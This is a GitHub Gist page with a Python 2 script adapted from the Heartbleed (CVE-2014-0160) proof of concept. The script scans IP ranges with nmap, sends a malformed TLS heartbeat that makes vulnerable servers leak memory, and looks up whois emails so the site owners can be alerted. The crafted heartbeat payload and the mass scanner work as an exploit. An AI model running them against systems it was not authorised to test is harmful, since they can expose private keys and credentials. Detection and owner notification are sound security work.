Created
April 9, 2014 21:44
-
-
Save olemartinorg/10320711 to your computer and use it in GitHub Desktop.
This a script to find the email addresses to the peple responsible for a HTTPS site that's found to be leaking memory according to the heartbleed bug. It will read the public certificate, find the CN (domain name, usually) and look that up via whois to gather email adresses to contact. Can dump to CSV.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) | |
# The author disclaims copyright to this source code. | |
# Quick patch for nmap support 08/04/2014 sartan | |
#found this was very handy to scan my own web ranges to see if they were vulnerable. | |
# Modification by olemartinorg on 09/04/2014 to collect more information on certifcates and alert | |
# the people responsible for a site | |
import sys | |
import struct | |
import socket | |
import time | |
import select | |
import nmap | |
import ssl | |
import OpenSSL | |
import subprocess | |
import re | |
from optparse import OptionParser | |
options = OptionParser(usage='%prog [range] [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160). Range is nmap syntax; eg 192.168.1.0-192.168.1.254, 10.15.0.0/16, 192.168.5.1,192.168.5.2,192.168.5.3') | |
options.add_option('-c', '--csv', action='store_true', default=False, help='Output CSV instead of human-readable text') | |
options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output') | |
debug = False | |
csv = False | |
def h2bin(x): | |
return x.replace(' ', '').replace('\n', '').decode('hex') | |
hello = h2bin(''' | |
16 03 02 00 dc 01 00 00 d8 03 02 53 | |
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf | |
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 | |
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 | |
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c | |
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 | |
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 | |
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c | |
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 | |
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 | |
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 | |
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 | |
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 | |
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 | |
00 0f 00 01 01 | |
''') | |
hb = h2bin(''' | |
18 03 02 00 03 | |
01 40 00 | |
''') | |
def hexdump(s): | |
for b in xrange(0, len(s), 16): | |
lin = [c for c in s[b:b + 16]] | |
hxdat = ' '.join('%02X' % ord(c) for c in lin) | |
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in lin) | |
print ' %04x: %-48s %s' % (b, hxdat, pdat) | |
def recvall(s, length, timeout=5): | |
endtime = time.time() + timeout | |
rdata = '' | |
remain = length | |
while remain > 0: | |
rtime = endtime - time.time() | |
if rtime < 0: | |
return None | |
r, w, e = select.select([s], [], [], 5) | |
if s in r: | |
try: | |
data = s.recv(remain) | |
except socket.error: | |
return None | |
# EOF? | |
if not data: | |
return None | |
rdata += data | |
remain -= len(data) | |
return rdata | |
def recvmsg(s): | |
hdr = recvall(s, 5) | |
if hdr is None: | |
if debug: | |
print 'Unexpected EOF receiving record header - server closed connection' | |
return None, None, None | |
typ, ver, ln = struct.unpack('>BHH', hdr) | |
pay = recvall(s, ln, 10) | |
if pay is None: | |
if debug: | |
print 'Unexpected EOF receiving record payload - server closed connection' | |
return None, None, None | |
if debug: | |
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) | |
return typ, ver, pay | |
def hit_hb(s): | |
s.send(hb) | |
while True: | |
typ, ver, pay = recvmsg(s) | |
if typ is None: | |
if debug: | |
print 'No heartbeat response received, server likely not vulnerable' | |
if typ == 24: | |
if debug: | |
print 'Received heartbeat response:' | |
hexdump(pay) | |
if len(pay) > 3: | |
if debug: | |
print 'WARNING: server returned more data than it should - server is vulnerable!' | |
return True | |
else: | |
if debug: | |
print 'Server processed malformed heartbeat, but did not return any extra data.' | |
if typ == 21: | |
if debug: | |
print 'Received alert:' | |
hexdump(pay) | |
if debug: | |
print 'Server returned error, likely not vulnerable' | |
return False | |
def scanhost(host, port): | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
if debug: | |
print 'Connecting... to', host, "on port", port | |
sys.stdout.flush() | |
try: | |
s.connect((host, port)) | |
except: | |
return False | |
if debug: | |
print 'Sending Client Hello...' | |
sys.stdout.flush() | |
s.send(hello) | |
if debug: | |
print 'Waiting for Server Hello...' | |
sys.stdout.flush() | |
while True: | |
typ, ver, pay = recvmsg(s) | |
if typ is None: | |
if debug: | |
print 'Server closed connection without sending Server Hello.' | |
return False | |
# Look for server hello done message. | |
if typ == 22 and ord(pay[0]) == 0x0E: | |
break | |
if debug: | |
print 'Sending heartbeat request...' | |
sys.stdout.flush() | |
#Sartan is laazy lazy lazy lazy | |
try: | |
s.send(hb) | |
except: | |
return False | |
try: | |
return hit_hb(s) | |
except: | |
return False | |
def findemail(ip, port): | |
cert = ssl.get_server_certificate((ip, port)) | |
x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert) | |
comp = x509.get_subject().get_components() | |
comp_dict = dict((x, y) for x, y in comp) | |
if 'CN' in comp_dict: | |
cert_host = comp_dict['CN'].lstrip('*.') | |
try: | |
socket.gethostbyname(cert_host) | |
except socket.gaierror: | |
# Looking up the hostname failed, so we'll assume the | |
# CN is not a valid hostname | |
if csv: | |
print ip+",yes,"+cert_host+"," | |
else: | |
print "The IP", ip, "is vulnerable, but i failed to look up the hostname in the certificate: ("+cert_host+")" | |
return | |
cert_host = cert_host.lstrip('w.') | |
try: | |
whois = subprocess.check_output(['whois', cert_host]) | |
except subprocess.CalledProcessError: | |
whois = "" | |
email_re = re.compile(r'([A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,15})', re.MULTILINE | re.IGNORECASE) | |
unique_emails = list(set(email_re.findall(whois))) | |
if unique_emails: | |
if csv: | |
print ip+",yes,"+cert_host+","+(";".join(unique_emails)) | |
else: | |
print "The IP", ip, "is vulnerable, and they seem to have a certificate belonging to", cert_host | |
print "According to whois, you can alert some of these people:" | |
print "; ".join(unique_emails) | |
else: | |
if csv: | |
print ip+",yes,"+cert_host+"," | |
else: | |
print "The IP", ip, "is vulnerable, and they seem to have a certificate belonging to", cert_host | |
print "Sadly, whois doesnt give me any email adresses for you to contact about this" | |
else: | |
if csv: | |
print ip+",no,," | |
else: | |
print "The IP", ip, "is vulnerable, but i found no CN in their certificate" | |
def startscan(hosts): | |
nm = nmap.PortScanner() | |
nm.scan(hosts, "443", arguments='--open -Pn') | |
for ip in nm.all_hosts(): | |
for port in nm[ip]['tcp'].keys(): | |
if debug: | |
print "Scanning", ip, port | |
if scanhost(ip, port): | |
findemail(ip, port) | |
def main(): | |
global debug, csv | |
(opts, args) = options.parse_args() | |
if len(args) < 1: | |
options.print_help() | |
return | |
debug = opts.debug | |
csv = opts.csv | |
if csv: | |
print "ip,cn_found,hostname,emails" | |
startscan(args[0]) | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment